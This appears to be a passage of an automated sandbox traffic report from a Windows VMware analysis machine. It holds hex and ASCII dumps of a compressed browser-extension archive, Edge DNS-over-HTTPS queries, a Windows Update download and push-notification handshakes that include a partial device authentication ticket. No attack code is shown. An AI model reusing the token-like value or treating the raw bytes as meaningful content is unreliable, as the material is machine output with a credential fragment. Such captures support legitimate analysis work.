                                                                                                                                                                                                                                                                                              2024-11-28 06:22:34 UTC1390INData Raw: ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 af 7f ff d5 d4 85 ac
                                                                                                                                                                                                                                                                                              Data Ascii: c$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:34 UTC1390INData Raw: c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 e2 00 5a c4 bf e3 99
                                                                                                                                                                                                                                                                                              Data Ascii: C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8QZ
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:34 UTC1390INData Raw: 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 b4 28 e5 ea ff 64 31
                                                                                                                                                                                                                                                                                              Data Ascii: n=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@(d1
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:34 UTC1390INData Raw: 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 16 96 fa 98 fd 47 dc
                                                                                                                                                                                                                                                                                              Data Ascii: cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6G
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:34 UTC1390INData Raw: 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 73 61 67 65 73 2e 6a
                                                                                                                                                                                                                                                                                              Data Ascii: o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/messages.j
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:34 UTC1390INData Raw: 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              36192.168.2.649809162.159.61.34438000C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              37192.168.2.649811172.64.41.34438000C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              38192.168.2.64982520.109.210.53443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:59 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tg1leHE4ZP6u9fN&MD=YRHauRyX HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                              2024-11-28 06:23:00 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                                                              MS-CorrelationId: 766a6123-70d6-4457-9d35-5061f1ece3c8
                                                                                                                                                                                                                                                                                              MS-RequestId: d2b93823-3d91-4153-b93a-cf8d955c8b50
                                                                                                                                                                                                                                                                                              MS-CV: eZMKrEIChEqP8DKa.0
                                                                                                                                                                                                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:59 GMT
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Content-Length: 30005
                                                                                                                                                                                                                                                                                              2024-11-28 06:23:00 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                                                              2024-11-28 06:23:00 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              39192.168.2.64982420.198.119.143443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:59 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6b 7a 49 42 61 68 35 43 33 55 61 74 50 51 53 68 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 39 63 39 38 64 31 33 66 33 32 66 34 39 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: kzIBah5C3UatPQSh.1Context: 289c98d13f32f49c
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:59 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:59 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6b 7a 49 42 61 68 35 43 33 55 61 74 50 51 53 68 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 39 63 39 38 64 31 33 66 33 32 66 34 39 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 75 30 6e 7a 46 74 78 61 77 47 2b 62 4c 68 74 52 6e 32 41 44 6c 4a 49 46 78 41 51 66 73 49 6d 61 65 71 50 73 70 52 73 73 6e 72 71 71 61 2f 62 65 4e 5a 77 2f 75 5a 59 78 30 6d 59 6a 67 42 4a 4c 52 4b 35 76 46 77 57 4b 58 58 2f 57 2f 76 6d 6a 6f 56 39 39 32 49 6c 68 68 50 34 6f 37 6b 66 42 69 55 4f 73 76 57 57 55 32 77 31 2b
                                                                                                                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: kzIBah5C3UatPQSh.2Context: 289c98d13f32f49c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXu0nzFtxawG+bLhtRn2ADlJIFxAQfsImaeqPspRssnrqqa/beNZw/uZYx0mYjgBJLRK5vFwWKXX/W/vmjoV992IlhhP4o7kfBiUOsvWWU2w1+
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:59 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6b 7a 49 42 61 68 35 43 33 55 61 74 50 51 53 68 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 39 63 39 38 64 31 33 66 33 32 66 34 39 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: kzIBah5C3UatPQSh.3Context: 289c98d13f32f49c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                              2024-11-28 06:23:00 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                              2024-11-28 06:23:00 UTC58INData Raw: 4d 53 2d 43 56 3a 20 59 42 35 30 4f 4d 42 59 52 45 75 6f 53 73 73 43 4d 6a 39 36 45 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                              Data Ascii: MS-CV: YB50OMBYREuoSssCMj96EQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              40192.168.2.64982720.198.119.143443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:23:37 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4d 33 5a 54 72 48 6f 7a 35 55 53 2b 4e 6b 77 36 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 31 31 32 64 35 32 66 66 35 65 66 35 64 37 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: M3ZTrHoz5US+Nkw6.1Context: 2112d52ff5ef5d7c
                                                                                                                                                                                                                                                                                              2024-11-28 06:23:37 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                              2024-11-28 06:23:37 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4d 33 5a 54 72 48 6f 7a 35 55 53 2b 4e 6b 77 36 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 31 31 32 64 35 32 66 66 35 65 66 35 64 37 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 75 30 6e 7a 46 74 78 61 77 47 2b 62 4c 68 74 52 6e 32 41 44 6c 4a 49 46 78 41 51 66 73 49 6d 61 65 71 50 73 70 52 73 73 6e 72 71 71 61 2f 62 65 4e 5a 77 2f 75 5a 59 78 30 6d 59 6a 67 42 4a 4c 52 4b 35 76 46 77 57 4b 58 58 2f 57 2f 76 6d 6a 6f 56 39 39 32 49 6c 68 68 50 34 6f 37 6b 66 42 69 55 4f 73 76 57 57 55 32 77 31 2b
                                                                                                                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: M3ZTrHoz5US+Nkw6.2Context: 2112d52ff5ef5d7c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXu0nzFtxawG+bLhtRn2ADlJIFxAQfsImaeqPspRssnrqqa/beNZw/uZYx0mYjgBJLRK5vFwWKXX/W/vmjoV992IlhhP4o7kfBiUOsvWWU2w1+
                                                                                                                                                                                                                                                                                              2024-11-28 06:23:37 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4d 33 5a 54 72 48 6f 7a 35 55 53 2b 4e 6b 77 36 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 31 31 32 64 35 32 66 66 35 65 66 35 64 37 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: M3ZTrHoz5US+Nkw6.3Context: 2112d52ff5ef5d7c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                              2024-11-28 06:23:37 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                              2024-11-28 06:23:37 UTC58INData Raw: 4d 53 2d 43 56 3a 20 38 4e 30 58 4a 61 4e 62 6e 6b 79 43 68 44 4e 70 53 65 63 6b 5a 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                              Data Ascii: MS-CV: 8N0XJaNbnkyChDNpSeckZw.0Payload parsing failed.


